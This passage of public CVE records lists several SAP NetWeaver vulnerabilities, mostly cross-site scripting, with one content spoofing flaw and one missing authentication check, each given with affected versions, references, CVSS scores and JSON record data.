"dateReserved": "2016-09-09T00:00:00",
"dateUpdated": "2024-08-06T01:57:47.627Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2470
Vulnerability from cvelistv5
Published
2018-10-09 13:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095 | x_refsource_CONFIRM | |
| https://launchpad.support.sap.com/#/notes/2684760 | x_refsource_MISC | |
| http://www.securityfocus.com/bid/105551 | vdb-entry, x_refsource_BID |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | SAP NetWeaver Application Server for ABAP |
Version: from 7.0 to 7.02 Version: 7.30 Version: 7.31 Version: 7.40 Version: from 7.50 to 7.53 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:34.206Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"name": "105551",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105551"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver Application Server for ABAP",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "from 7.0 to 7.02"
},
{
"status": "affected",
"version": "7.30"
},
{
"status": "affected",
"version": "7.31"
},
{
"status": "affected",
"version": "7.40"
},
{
"status": "affected",
"version": "from 7.50 to 7.53"
}
]
}
],
"datePublic": "2018-10-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-12T09:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"name": "105551",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105551"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2470",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver Application Server for ABAP",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "from 7.0 to 7.02"
},
{
"version_affected": "=",
"version_value": "7.30"
},
{
"version_affected": "=",
"version_value": "7.31"
},
{
"version_affected": "=",
"version_value": "7.40"
},
{
"version_affected": "=",
"version_value": "from 7.50 to 7.53"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095",
"refsource": "CONFIRM",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2684760",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"name": "105551",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105551"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2470",
"datePublished": "2018-10-09T13:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:34.206Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2434
Vulnerability from cvelistv5
Published
2018-07-10 18:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/105088 | vdb-entry, x_refsource_BID | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000 | x_refsource_CONFIRM | |
| https://launchpad.support.sap.com/#/notes/2633180 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| ▼ | SAP | SAP NetWeaver (UI_Infra) |
Version: = 1.0 |
||||||||||||
|
|||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:33.594Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "105088",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105088"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2633180"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (UI_Infra)",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 1.0"
}
]
},
{
"product": "SAP UI Implementation for Decoupled Innovations (UI_700)",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 2.0"
}
]
},
{
"product": "SAP NetWeaver ",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.0"
}
]
},
{
"product": "SAP User Interface Technology (SAP_UI)",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.4"
},
{
"status": "affected",
"version": "= 7.5"
},
{
"status": "affected",
"version": "= 7.51"
},
{
"status": "affected",
"version": "= 7.52"
}
]
}
],
"datePublic": "2018-07-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Content Spoofing ",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-08-16T09:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"name": "105088",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105088"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2633180"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2434",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (UI_Infra)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "1.0"
}
]
}
},
{
"product_name": "SAP UI Implementation for Decoupled Innovations (UI_700)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "2.0"
}
]
}
},
{
"product_name": "SAP NetWeaver ",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.0"
}
]
}
},
{
"product_name": "SAP User Interface Technology (SAP_UI)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.4"
},
{
"version_name": "=",
"version_value": "7.5"
},
{
"version_name": "=",
"version_value": "7.51"
},
{
"version_name": "=",
"version_value": "7.52"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Content Spoofing "
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "105088",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105088"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000",
"refsource": "CONFIRM",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2633180",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2633180"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2434",
"datePublished": "2018-07-10T18:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:33.594Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-0021
Vulnerability from cvelistv5
Published
2023-03-14 04:34
Modified
2024-08-02 04:54
Severity ?
EPSS score ?
Summary
Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver |
Version: 700 Version: 701 Version: 702 Version: 731 Version: 740 Version: 750 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.586Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3274920"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "700"
},
{
"status": "affected",
"version": "701"
},
{
"status": "affected",
"version": "702"
},
{
"status": "affected",
"version": "731"
},
{
"status": "affected",
"version": "740"
},
{
"status": "affected",
"version": "750"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDue to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.\u003c/p\u003e"
}
],
"value": "Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-14T04:34:41.118Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3274920"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-0021",
"datePublished": "2023-03-14T04:34:41.118Z",
"dateReserved": "2022-12-22T15:07:12.503Z",
"dateUpdated": "2024-08-02T04:54:32.586Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2010-2904
Vulnerability from cvelistv5
Published
2010-07-28 21:00
Modified
2024-08-07 02:46
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp.
References
| ▼ | URL | Tags |
|---|---|---|
| http://dsecrg.com/pages/vul/show.php?id=168 | x_refsource_MISC | |
| http://secunia.com/advisories/40712 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.osvdb.org/66640 | vdb-entry, x_refsource_OSVDB | |
| http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt | x_refsource_MISC | |
| http://www.osvdb.org/66639 | vdb-entry, x_refsource_OSVDB | |
| http://www.vupen.com/english/advisories/2010/1935 | vdb-entry, x_refsource_VUPEN | |
| https://service.sap.com/sap/support/notes/1416047 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/60668 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:46:48.596Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"name": "40712",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/40712"
},
{
"name": "66640",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/66640"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt"
},
{
"name": "66639",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/66639"
},
{
"name": "ADV-2010-1935",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"name": "sapnetweaver-paramhelp-xss(60668)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-07-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"name": "40712",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/40712"
},
{
"name": "66640",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/66640"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt"
},
{
"name": "66639",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/66639"
},
{
"name": "ADV-2010-1935",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"name": "sapnetweaver-paramhelp-xss(60668)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-2904",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://dsecrg.com/pages/vul/show.php?id=168",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"name": "40712",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/40712"
},
{
"name": "66640",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/66640"
},
{
"name": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt",
"refsource": "MISC",
"url": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt"
},
{
"name": "66639",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/66639"
},
{
"name": "ADV-2010-1935",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"name": "https://service.sap.com/sap/support/notes/1416047",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"name": "sapnetweaver-paramhelp-xss(60668)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-2904",
"datePublished": "2010-07-28T21:00:00",
"dateReserved": "2010-07-28T00:00:00",
"dateUpdated": "2024-08-07T02:46:48.596Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-41367
Vulnerability from cvelistv5
Published
2023-09-12 01:59
Modified
2024-09-26 14:38
Severity ?
EPSS score ?
Summary
Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user’s email address. There is no integrity/availability impact.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver (Guided Procedures) |
Version: 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:01:34.282Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3348142"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-41367",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-26T14:38:02.228553Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-26T14:38:15.247Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Guided Procedures)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDue to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user\u2019s email address. There is no integrity/availability impact.\u003c/p\u003e"
}
],
"value": "Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user\u2019s email address. There is no integrity/availability impact.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-306",
"description": "CWE-306: Missing Authentication for Critical Function",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-12T01:59:55.915Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3348142"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing Authentication check in SAP NetWeaver (Guided Procedures)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-41367",
"datePublished": "2023-09-12T01:59:55.915Z",
"dateReserved": "2023-08-29T05:27:56.301Z",
"dateUpdated": "2024-09-26T14:38:15.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2011-5263
Vulnerability from cvelistv5
Published
2013-02-12 20:00
Modified
2024-08-07 00:30
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/45708 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/49266/info | vdb-entry, x_refsource_BID | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/69331 | vdb-entry, x_refsource_XF | |
| http://dsecrg.com/pages/vul/show.php?id=330 | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/520551/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:30:46.801Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "45708",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/45708"
},
{
"name": "49266",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"name": "20110819netweaver-server-xss(69331)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"name": "20111117 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-08-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "45708",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/45708"
},
{
"name": "49266",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"name": "20110819netweaver-server-xss(69331)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"name": "20111117 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-5263",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
